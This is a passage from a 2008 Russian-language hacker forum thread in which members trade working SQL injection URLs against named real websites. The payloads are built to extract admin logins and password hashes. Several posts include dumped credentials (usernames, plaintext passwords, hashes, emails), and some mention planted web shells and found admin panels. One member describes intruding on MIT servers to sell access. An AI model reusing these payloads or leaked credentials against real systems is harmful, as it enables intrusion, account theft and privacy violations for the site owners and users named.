SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    fcshirtshop.com

     
  2. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    www.pirok.ru/news.php?id=-1+union+select+1,2,name,4,password,6+from+admin/*

    сверху логин, снизу пароль админа
    Админка по адресу: www.pirok.ru/admin
     
  3. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    различные смс-билинги:
    Code:
    http://www.3bill.com/casestudy.html?client_id=-1+UNION+SELECT+1,CONCAT(0x6472385F3838777777333371,concat(column_name),0x686874666638385F363632),3,4,5,6,7+FROM+information_schema.columns+where+table_name='clients'+limit+1,1/*
    клиентская часть кстати на другой машине:
    Code:
    http://client.3bill.com/extranet/client_pages/cms/lib/exportXML.php?clientid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&service=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&sort=ASC&sheet=detailList.xsl
    Code:
    client_name
    description
    client_logo
    case_study
    picture
    sortorder
    COLLATIONS
    cc_audit
    ccdata
    charge_model
    client_rights
    clientrate
    clientv2_adodblog
    configuration
    credit_status
    creditnote_lines
    creditnotes
    cron_manager
    prod_3bill:ccdata
    cc_audit
    ccdata
    charge_model
    client_rights
    clientrate
    clientv2_adodblog
    configuration
    credit_status
    creditnote_lines
    creditnotes
    cron_manager
    cron_manager_log
    defaultrate
    defaultrate_copy
    delivery_method
    показун:
    Code:
    http://www.pokazun.ru/sms.php?showDescr=1&pl=1100+union+select+1+from+users_advPlaces/* 
    посимвольным брутом..
    ещё 1 буржуйский с пр6:
    Code:
    http://mblox.com/news/press-announcements/press_release.php?press_id=11'+UNION+SELECT+1,concat(email_name,0x3b,email),3,4,5,6,7+FROM+careers+limit+1,1/*
    Code:
    mbloxwebdb:careers
    mbloxwebdb:contact_us_countries
    mbloxwebdb:doc_reg
    mbloxwebdb:enquiry
    mbloxwebdb:events
    mbloxwebdb:industry_news
    mbloxwebdb:press_release
    mbloxwebdb:short_code
    mbloxwebdb:careers
    mbloxwebdb:contact_us_countries
    mbloxwebdb:doc_reg
    mbloxwebdb:enquiry
    mbloxwebdb:events
    mbloxwebdb:industry_news
    mbloxwebdb:press_release
    mbloxwebdb:short_code
    career_id
    department
    title
    location
    description
    email
    email_name
    publish
    id
    local
    country
    send_to
    id
    name
    email
    company
    country
    browser
    ip
    date_created
    id
    name
    email
    telephone
    company
    country
    country_other
    industry
    enquiry
    sentto
    browser
    ip
    date_created
    event_id
    title
    location
    date
    enddate
    message
    logo
    minilogo
    email
    event_link
    info_link
    shortcode_id
    shortcode
    country
    company
    phone_number
    так что грабить смсками растяжимое понятие)

    на последок старичок:
    Code:
    http://www.digiseller.ru/outside/default.asp?searchstr=--
    может кто то и раскрутит)
     
    6 people like this.
  4. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    RussianSt.com - Русскоязычный Портал: Интернет-Каталог, Каталог Бизнесов, Аукцион, Почта, Доски Объявлений, Форум, Чат, Развлечения, Справочная..

    andylv:andy2a:[email protected]
    eliz:Godisov:[email protected]

    madina:b98facb4a69f2a46b22a54890e2b60f1:[email protected]
    rusworld:e04e5ecd5ef138690e3ec40a486ea6a1:[email protected]
    bexpress:42c391321d55118cf2ce5e33964edb33:[email protected]

    admin:MfPlkg:[email protected]
    ADMINISTRATOR:3JOIQm:[email protected]

    glas1976:Ls38T:[email protected]
    znax:M7hli:[email protected]
    Forsems:C0apt:[email protected]

    m8t4t0o0w3v8:guNo4:[email protected]
    1363716:cHS39:[email protected]
    werxerty:NQU2G:[email protected]

    vjgfp:GmOj3:[email protected]
    gribok:O1lB9:[email protected]
    computp:0GHNA:[email protected]

    virusds:fo3e1:[email protected]
    pav--eldm:4YW0y:p[email protected]
    piciolog:OOOQX:p[email protected]
     
    #5664 ~!DoK_tOR!~, 14 Jun 2008
    Last edited: 14 Jun 2008
  5. Toxic

    Toxic Member

    Joined:
    12 Jan 2008
    Messages:
    9
    Likes Received:
    7
    Reputations:
    0
    http://www.minskvodstroy.by/index.php?p=gallerypic&img_id=-86+union+select+1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9+from+minbud_user+limit+2,1--&galid=6&area=1&ascdesc=desc

    1 cdea86d0b320a9485cc1ab925603d4ab ytrewq [email protected]

    Там еще шел лежит )) ;)
     
    #5665 Toxic, 14 Jun 2008
    Last edited: 14 Jun 2008
  6. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    Code:
    http://azart.net.ua/bookmakers/catalog/?SECT=-1'+union+select+concat('%3Cbr%3E',version(),'%3Cbr%3E',user(),'%3Cbr%3E',database())/*
     
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Comingsoon.net
    вывод в <meta name="DESCRIPTION" content="4.1.22:comingso_nextra:comingso_nextra@csn-node1-int">

    Aen.ru
    Bmoca.org
    Eicta.org
    Bti.cornell.edu - Еда
    Freedocumentaries.org
    подбор?

    Umpcportal.com
    скуль?
     
    #5667 sabe, 15 Jun 2008
    Last edited: 15 Jun 2008
    1 person likes this.
  8. lastsmile

    lastsmile Elder - Старейшина

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    небольшой магазин
    http://www.landmetzgerei.at/

    http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

    а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить
     
  9. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Лови:
    http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,version(),user(),database())+using+latin1),4,5,6,7,8,9/*
    Таблицы не подбирал, это уж сам давай.
    _____________________________

    Цель - media.mit.edu, пр8, начал копать

    таблицы не подобрал.
    Хеши которые сбрутились:
    остальные в очереди.

    На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.

    Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
    Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
    lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.

    Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.

    Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
    Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
    phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.
     
    #5669 Imperou$, 15 Jun 2008
    Last edited: 15 Jun 2008
    2 people like this.
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    если есть доступ к mysql.user.. как нащет file_priv?
    сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности.
    mit.edu/admin - раскрытие путей.. (кое каких)
    ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд...
    это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))
     
    #5670 sabe, 15 Jun 2008
    Last edited: 15 Jun 2008
    1 person likes this.
  11. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.rosana.de

    Code:
    http://www.rosana.de/main.asp?main=-1'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+mysql.user/*
    http://www.alpinestars.se

    Code:
    http://www.alpinestars.se/MainVisaUnderBild.asp?nid=1+or+1=(SELECT+TOP+1+cast(user+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
     
    1 person likes this.
  12. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Polemika.com.ua
    вывод в txt файл..)
     
    #5672 sabe, 15 Jun 2008
    Last edited: 15 Jun 2008
    1 person likes this.
  13. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    да скуль
    _http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
     
    4 people like this.
  14. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://bootsus.bri-global.com/
    Code:
    http://bootsus.bri-global.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(admin_username+as+nvarchar)%2Bchar(58)%2Bcast(admin_password+as+nvarchar)+FROM+admin_users)--&sid=1&iid=198
    http://www.theovalgroup.com/
    Code:
    http://www.theovalgroup.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=2477&pid=35763
    http://www.davy.co.uk/
    Code:
    http://www.davy.co.uk/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=179&pid=43144
     
  15. Toxic

    Toxic Member

    Joined:
    12 Jan 2008
    Messages:
    9
    Likes Received:
    7
    Reputations:
    0
    http://f1dvd.ru/index.php?p=gallerypic&img_id=-519+union+select+1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=45&area=1&ascdesc=desc&print=1

    [email protected]|563f311d2613a827c2d3897a024ddf74
    51654

    Любителям формулы 1 ))
     
  16. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    2 sabe
    Пробей, file_priv как видишь нет, я б отписал. От админки без пассов толку нет, рута ведь туда не втулишь, я видел её. И про админку я спрашивал не на этом сайте :) Тот линк я к сожалению выложить не могу, слишком дорого мне выйдет.
    Рут то на media.mit.edu по идее, т.к. media.mit.edu
    и mit.edu на разных серваках и ипах,соответсвенно affect.media.mit.edu откуда стянули рута, это поддомен корня media.mit.edu на этом серваке, и рут по идее должен быть к нему, а не к mit.edu, сервы то разные... Но про это я писал выше, подразумевая целевой рут.
    Да в принципе я и ломал не для новостей, а сеошникам\скупщикам загнать как еду пиаристую. Как видишь всё корыстно :).
     
    1 person likes this.
  17. z1k

    z1k New Member

    Joined:
    11 May 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    еси найдете чота интересное делитесь впечатлениями ;)
    Code:
    http://tusbuscadores.com/notiprensa/display.php?ID=-8077+union+select+1,2,vers ion(),4,5,6,7, 8,9/*
    Code:
    http://www.xpg.us/cerebra/display.php?id=-574+uni on+se lect+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
    Code:
    http://www.rayner.com/products.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9/*
    Code:
    http://www.naturalaquario.com/products.php?id=-2+union+select+1,version()/*
    Code:
    http://www.nnovia.com/products.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25/*
     
    1 person likes this.
  18. LUKAC

    LUKAC Banned

    Joined:
    19 Aug 2007
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    никакого картона.
     
    #5678 LUKAC, 15 Jun 2008
    Last edited by a moderator: 15 Jun 2008
  19. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Кардинг запрещен на форуме.

    Чет давно нигде не копалсо )
    Крутить ничто не стал. Смотрите - будет что интересное - отписывайтесь )



    [+]
    2:dreaming:7bcde95b0707ae0f93aa6ec76745cf02
    436948db@localhost:5.0.27:436948db
     
    #5679 Fata1ex, 15 Jun 2008
    Last edited: 15 Jun 2008
    2 people like this.
  20. Toxic

    Toxic Member

    Joined:
    12 Jan 2008
    Messages:
    9
    Likes Received:
    7
    Reputations:
    0
    http://boking.ru/index.php?p=gallerypic&img_id=-65+union+select+1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=2&area=1&ascdesc=desc


    http://boking.ru/admin/

    ringo [email protected]

    Если хорошо поискать можете и шел найти если кому надо ;)
     
Thread Status:
Not open for further replies.